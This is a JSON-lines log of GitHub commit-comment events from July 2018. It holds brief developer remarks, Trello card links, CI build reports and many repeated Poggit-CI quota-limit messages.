{"id":"8031570184","type":"CommitCommentEvent","actor":{"login":"grumpit"},"repo":{"name":"trevorturk/flash_cookie_session"},"payload":{"comment":{"id":29866118,"position":null,"line":null,"path":null,"commit_id":"28a436916cd165f4cce7fc1171d3af7a131b6010","created_at":"2018-07-28T03:21:46Z","updated_at":"2018-07-28T03:21:46Z","author_association":"NONE","body":"Yep, we're just using your github version for now, and will fork it as an\ninterim solution until we can get rid of Flash altogether :P\n\nThanks :)\n\nOn Thu, Jul 26, 2018 at 7:17 PM, Trevor Turk <notifications@github.com>\nwrote:\n\n> Sorry I'm not planning on maintaining the gem anymore -- you can use\n> directly from GitHub or just copy the code into your own app?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/trevorturk/flash_cookie_session/commit/28a436916cd165f4cce7fc1171d3af7a131b6010#commitcomment-29851646>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAHdKumWA1sEDDIL-FC4ecJub1-FPxawks5uKk4fgaJpZM4VidVj>\n> .\n>\n"}},"created_at":"2018-07-28T03:21:46Z"}
{"id":"8031579764","type":"CommitCommentEvent","actor":{"login":"Cairo2k18"},"repo":{"name":"Cairo2k18/jackbot"},"payload":{"comment":{"id":29866140,"position":null,"line":null,"path":null,"commit_id":"0a24f538ea236fee9e39fd992f40f283fc98278b","created_at":"2018-07-28T03:29:24Z","updated_at":"2018-07-28T03:29:24Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Website redesign](https://trello.com/c/EoqoQf5T/9-website-redesign)"}},"created_at":"2018-07-28T03:29:24Z"}
{"id":"8031579950","type":"CommitCommentEvent","actor":{"login":"Cairo2k18"},"repo":{"name":"Cairo2k18/jackbot"},"payload":{"comment":{"id":29866144,"position":null,"line":null,"path":null,"commit_id":"52784663a736ab03bd31a43f82e3552bcb0a03b9","created_at":"2018-07-28T03:29:33Z","updated_at":"2018-07-28T03:29:33Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Website redesign](https://trello.com/c/EoqoQf5T/9-website-redesign)"}},"created_at":"2018-07-28T03:29:33Z"}
{"id":"8031580167","type":"CommitCommentEvent","actor":{"login":"Cairo2k18"},"repo":{"name":"Cairo2k18/jackbot"},"payload":{"comment":{"id":29866145,"position":null,"line":null,"path":null,"commit_id":"7dc92ff3f61fae8492a8c21075953691a17942cb","created_at":"2018-07-28T03:29:43Z","updated_at":"2018-07-28T03:29:43Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Website redesign](https://trello.com/c/EoqoQf5T/9-website-redesign)"}},"created_at":"2018-07-28T03:29:43Z"}
{"id":"8031580376","type":"CommitCommentEvent","actor":{"login":"Cairo2k18"},"repo":{"name":"Cairo2k18/jackbot"},"payload":{"comment":{"id":29866146,"position":null,"line":null,"path":null,"commit_id":"ef56c8b3606a041ee15c066cc094539ba4bf6bad","created_at":"2018-07-28T03:29:52Z","updated_at":"2018-07-28T03:29:52Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Website redesign](https://trello.com/c/EoqoQf5T/9-website-redesign)"}},"created_at":"2018-07-28T03:29:52Z"}
{"id":"8031580740","type":"CommitCommentEvent","actor":{"login":"Cairo2k18"},"repo":{"name":"Cairo2k18/jackbot"},"payload":{"comment":{"id":29866148,"position":null,"line":null,"path":null,"commit_id":"fd8c839728cf5e387c58387036b882868907bc6d","created_at":"2018-07-28T03:30:06Z","updated_at":"2018-07-28T03:30:06Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Website redesign](https://trello.com/c/EoqoQf5T/9-website-redesign)"}},"created_at":"2018-07-28T03:30:06Z"}
{"id":"8031581125","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Beinqberry/CustomAlerts"},"payload":{"comment":{"id":29866151,"position":null,"line":null,"path":null,"commit_id":"3d6b217e7edbb880fb370137cf5f2d85d199b53a","created_at":"2018-07-28T03:30:19Z","updated_at":"2018-07-28T03:30:19Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Beinqberry/CustomAlerts/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `8c136b1c-9216-11e8-9680-f7b8709fb84f`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T03:30:19Z"}
{"id":"8031581349","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Beinqberry/Broadcaster"},"payload":{"comment":{"id":29866152,"position":null,"line":null,"path":null,"commit_id":"5309734cf233dffe3cc092364ae73834423aa43e","created_at":"2018-07-28T03:30:25Z","updated_at":"2018-07-28T03:30:25Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Beinqberry/Broadcaster/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `900f508c-9216-11e8-82c2-0adb2dfd005b`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T03:30:25Z"}
{"id":"8031582107","type":"CommitCommentEvent","actor":{"login":"DrewNaylor"},"repo":{"name":"DrewNaylor/UXL-Launcher"},"payload":{"comment":{"id":29866158,"position":null,"line":null,"path":null,"commit_id":"8137e329701724d7036a26e3273c19017f365ece","created_at":"2018-07-28T03:31:00Z","updated_at":"2018-07-28T03:31:00Z","author_association":"OWNER","body":"The `File>New` submenu in UXL Launcher is based on the overall organization of the LibreOffice 4.4.3.2 `File>New` menu."}},"created_at":"2018-07-28T03:31:00Z"}
{"id":"8031582185","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Beinqberry/CustomAlerts"},"payload":{"comment":{"id":29866159,"position":null,"line":null,"path":null,"commit_id":"3366c9f621344fec445b3879d0b6694778e1c23c","created_at":"2018-07-28T03:31:03Z","updated_at":"2018-07-28T03:31:03Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Beinqberry/CustomAlerts/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `a67eca78-9216-11e8-929b-2d8c81caaa5b`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T03:31:03Z"}
{"id":"8031582340","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Beinqberry/Broadcaster"},"payload":{"comment":{"id":29866160,"position":null,"line":null,"path":null,"commit_id":"b1ab460bc08d5788f4b7d3fbe7651c500ca322a8","created_at":"2018-07-28T03:31:11Z","updated_at":"2018-07-28T03:31:11Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Beinqberry/Broadcaster/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `ab3940b6-9216-11e8-8cd5-a85a76197b51`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T03:31:11Z"}
{"id":"8031583345","type":"CommitCommentEvent","actor":{"login":"MSLaguana"},"repo":{"name":"Microsoft/ChakraCore"},"payload":{"comment":{"id":29866162,"position":5,"line":4546,"path":"lib/Runtime/ByteCode/ByteCodeSerializer.cpp","commit_id":"e16792c186ef7a88f8a6be4a7045f5ca6a6405dd","created_at":"2018-07-28T03:31:55Z","updated_at":"2018-07-28T03:31:55Z","author_association":"MEMBER","body":"Are you sure that this is valid? Even if `propertyCount` is 0 the next thing we do is go and interpret `serialized->offset + deserializeInto->GetBuffer()` as a `PropertyIdArray` and go and write things on it; if this assert is failing, that suggests that we are writing into the memory of something else."}},"created_at":"2018-07-28T03:31:55Z"}
{"id":"8031585166","type":"CommitCommentEvent","actor":{"login":"DragonHole"},"repo":{"name":"DragonHole/okok"},"payload":{"comment":{"id":29866164,"position":null,"line":null,"path":null,"commit_id":"f41d2a0cdb588d8f89fda1c39be6f4c88460304c","created_at":"2018-07-28T03:33:18Z","updated_at":"2018-07-28T03:33:18Z","author_association":"OWNER","body":"fixed problem in Tetris::reset()"}},"created_at":"2018-07-28T03:33:18Z"}
{"id":"8031585270","type":"CommitCommentEvent","actor":{"login":"alexxxdev"},"repo":{"name":"AEXmod/platform_packages_apps_Dialer"},"payload":{"comment":{"id":29866166,"position":null,"line":null,"path":null,"commit_id":"fb733dce7f47c02fbc1f57f3f24560e03a5ba8b2","created_at":"2018-07-28T03:33:22Z","updated_at":"2018-07-28T03:33:22Z","author_association":"MEMBER","body":"@EndLess728 thanks, i will try to fix it"}},"created_at":"2018-07-28T03:33:22Z"}
{"id":"8031587507","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Beinqberry/CustomAlerts"},"payload":{"comment":{"id":29866172,"position":null,"line":null,"path":null,"commit_id":"9a5d71308ca20c99ce20a58cd95bda231ddb1d69","created_at":"2018-07-28T03:35:14Z","updated_at":"2018-07-28T03:35:14Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Beinqberry/CustomAlerts/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `3c0c88aa-9217-11e8-9c56-548af5aff4b4`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T03:35:14Z"}
{"id":"8031588464","type":"CommitCommentEvent","actor":{"login":"amandeepmittal"},"repo":{"name":"zeolearn/nodejs-text-tutorial"},"payload":{"comment":{"id":29866176,"position":null,"line":null,"path":null,"commit_id":"966a344cd66f1be7682bcc0caa8601c9629b3469","created_at":"2018-07-28T03:36:01Z","updated_at":"2018-07-28T03:36:01Z","author_association":"COLLABORATOR","body":"@baluragala I have updated module 9, please have a look. I have added screenshots and brief about how to setup breakpoints without using `debugger` keyword. I think this is the best explanation I can provide. "}},"created_at":"2018-07-28T03:36:01Z"}
{"id":"8031595405","type":"CommitCommentEvent","actor":{"login":"jmroot"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29866197,"position":null,"line":null,"path":null,"commit_id":"5d5fc0e942d7a9a6f31308ee9d3b2b70e93bc425","created_at":"2018-07-28T03:41:52Z","updated_at":"2018-07-28T03:41:52Z","author_association":"MEMBER","body":"Like modulegraph, py2app 0.14 does not work correctly with python 3.7 yet."}},"created_at":"2018-07-28T03:41:52Z"}
{"id":"8031595725","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29866198,"position":null,"line":null,"path":null,"commit_id":"be848eff013c959e0eefed9511197efc2da77d27","created_at":"2018-07-28T03:42:08Z","updated_at":"2018-07-28T03:42:08Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1708 of 1708 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be848eff013c959e0eefed9511197efc2da77d27-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be848eff013c959e0eefed9511197efc2da77d27-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be848eff013c959e0eefed9511197efc2da77d27-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-28T03:42:08Z"}
{"id":"8031595962","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Beinqberry/CustomAlerts"},"payload":{"comment":{"id":29866199,"position":null,"line":null,"path":null,"commit_id":"e39ba77bb9bf1e49fdf983818eb96c479f63abe3","created_at":"2018-07-28T03:42:18Z","updated_at":"2018-07-28T03:42:18Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Beinqberry/CustomAlerts/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `38ffbbcc-9218-11e8-84d4-4fb659b4d198`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T03:42:18Z"}
{"id":"8031598634","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Beinqberry/CustomAlerts"},"payload":{"comment":{"id":29866201,"position":null,"line":null,"path":null,"commit_id":"f36a579ccee792378b35fd1d90c0205614cae3e6","created_at":"2018-07-28T03:44:18Z","updated_at":"2018-07-28T03:44:18Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Beinqberry/CustomAlerts/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `804dda9a-9218-11e8-8610-ae2c66e14bd0`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T03:44:18Z"}
{"id":"8031599444","type":"CommitCommentEvent","actor":{"login":"Kalaborative"},"repo":{"name":"Kalaborative/survivio-cheat"},"payload":{"comment":{"id":29866205,"position":null,"line":null,"path":null,"commit_id":"04af38911e41a3c7b1dcbff86335a88cb5c970c5","created_at":"2018-07-28T03:45:00Z","updated_at":"2018-07-28T03:45:00Z","author_association":"OWNER","body":"#6 "}},"created_at":"2018-07-28T03:45:00Z"}
{"id":"8031600829","type":"CommitCommentEvent","actor":{"login":"cassianojr"},"repo":{"name":"cassianojr/portfolio"},"payload":{"comment":{"id":29866212,"position":null,"line":null,"path":null,"commit_id":"10120131087528e1056b7e9e4687b9e892625836","created_at":"2018-07-28T03:46:14Z","updated_at":"2018-07-28T03:46:14Z","author_association":"OWNER","body":"Deleted CNAME"}},"created_at":"2018-07-28T03:46:14Z"}
{"id":"8031602386","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29866219,"position":1,"line":null,"path":"1532749661.76/github_test.txt","commit_id":"3afd01fa518f1dfbb796ef3de735a24832360ccb","created_at":"2018-07-28T03:47:43Z","updated_at":"2018-07-28T03:47:43Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-28T03:47:43Z"}
{"id":"8031607746","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29866237,"position":null,"line":null,"path":null,"commit_id":"9be523493c4b59aba8e09b2e8d0c6b5c74f29899","created_at":"2018-07-28T03:52:42Z","updated_at":"2018-07-28T03:52:42Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (3364 of 3364 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9be523493c4b59aba8e09b2e8d0c6b5c74f29899-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9be523493c4b59aba8e09b2e8d0c6b5c74f29899-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-28T03:52:42Z"}
{"id":"8031608664","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29866239,"position":null,"line":null,"path":null,"commit_id":"7c1a852004b7c1a5aaaf42bb5f1376c927256308","created_at":"2018-07-28T03:53:34Z","updated_at":"2018-07-28T03:53:34Z","author_association":"CONTRIBUTOR","body":"Kevin's \"duplicates\" weren't duplicates. They had changes and you deleted them."}},"created_at":"2018-07-28T03:53:34Z"}
{"id":"8031609331","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Beinqberry/CustomAlerts"},"payload":{"comment":{"id":29866240,"position":null,"line":null,"path":null,"commit_id":"566375d4436fd4cfc45e9652511e7cee8a57ae8c","created_at":"2018-07-28T03:54:14Z","updated_at":"2018-07-28T03:54:14Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Beinqberry/CustomAlerts/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `e3ba05bc-9219-11e8-86d0-b37a3332bcfd`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T03:54:14Z"}
{"id":"8031609448","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Beinqberry/ExplodableUnbreakables"},"payload":{"comment":{"id":29866241,"position":null,"line":null,"path":null,"commit_id":"f884ee39d88fce14a69b818cbaa5e9534c7f35c7","created_at":"2018-07-28T03:54:22Z","updated_at":"2018-07-28T03:54:22Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Beinqberry/ExplodableUnbreakables/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `e878c502-9219-11e8-9599-23eccc522f60`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T03:54:22Z"}
{"id":"8031609582","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Beinqberry/Farms"},"payload":{"comment":{"id":29866242,"position":null,"line":null,"path":null,"commit_id":"671d7daca6b0fc861cd893e3651f8ab41aec8b64","created_at":"2018-07-28T03:54:30Z","updated_at":"2018-07-28T03:54:30Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Beinqberry/Farms/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `ed74c9f2-9219-11e8-8c70-c5b637f5de5d`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T03:54:30Z"}
{"id":"8031609698","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Beinqberry/Masks"},"payload":{"comment":{"id":29866243,"position":null,"line":null,"path":null,"commit_id":"acfeac3b6dae5ceb6fb247f47dfa3f79b71112d5","created_at":"2018-07-28T03:54:38Z","updated_at":"2018-07-28T03:54:38Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Beinqberry/Masks/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `f1ec20de-9219-11e8-9d16-47e6b96bce8f`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T03:54:38Z"}
{"id":"8031610350","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29866249,"position":null,"line":null,"path":null,"commit_id":"cb6f5e225ddd190d13af35b0940c33051737f937","created_at":"2018-07-28T03:55:13Z","updated_at":"2018-07-28T03:55:13Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-28T03:55:13Z"}
{"id":"8031610435","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Beinqberry/ExplodableUnbreakables"},"payload":{"comment":{"id":29866251,"position":null,"line":null,"path":null,"commit_id":"02223d9951ddac5b07913dbfbaeb00c213b20dfa","created_at":"2018-07-28T03:55:17Z","updated_at":"2018-07-28T03:55:17Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Beinqberry/ExplodableUnbreakables/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `091348fa-921a-11e8-8516-ba116859c24a`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T03:55:17Z"}
{"id":"8031611195","type":"CommitCommentEvent","actor":{"login":"AzGilrock"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29866253,"position":null,"line":null,"path":null,"commit_id":"944bc1b2fb7ec8b74e9dfc28985b8d4ee7573e35","created_at":"2018-07-28T03:55:59Z","updated_at":"2018-07-28T03:55:59Z","author_association":"COLLABORATOR","body":"This should have never been done.  I investigated this behavior long ago."}},"created_at":"2018-07-28T03:55:59Z"}
{"id":"8031612875","type":"CommitCommentEvent","actor":{"login":"TheLordOfAllMuffins"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29866261,"position":null,"line":null,"path":null,"commit_id":"7c1a852004b7c1a5aaaf42bb5f1376c927256308","created_at":"2018-07-28T03:57:32Z","updated_at":"2018-07-28T03:57:32Z","author_association":"CONTRIBUTOR","body":"the changes can be taken from here and put in the right place\r\n"}},"created_at":"2018-07-28T03:57:32Z"}
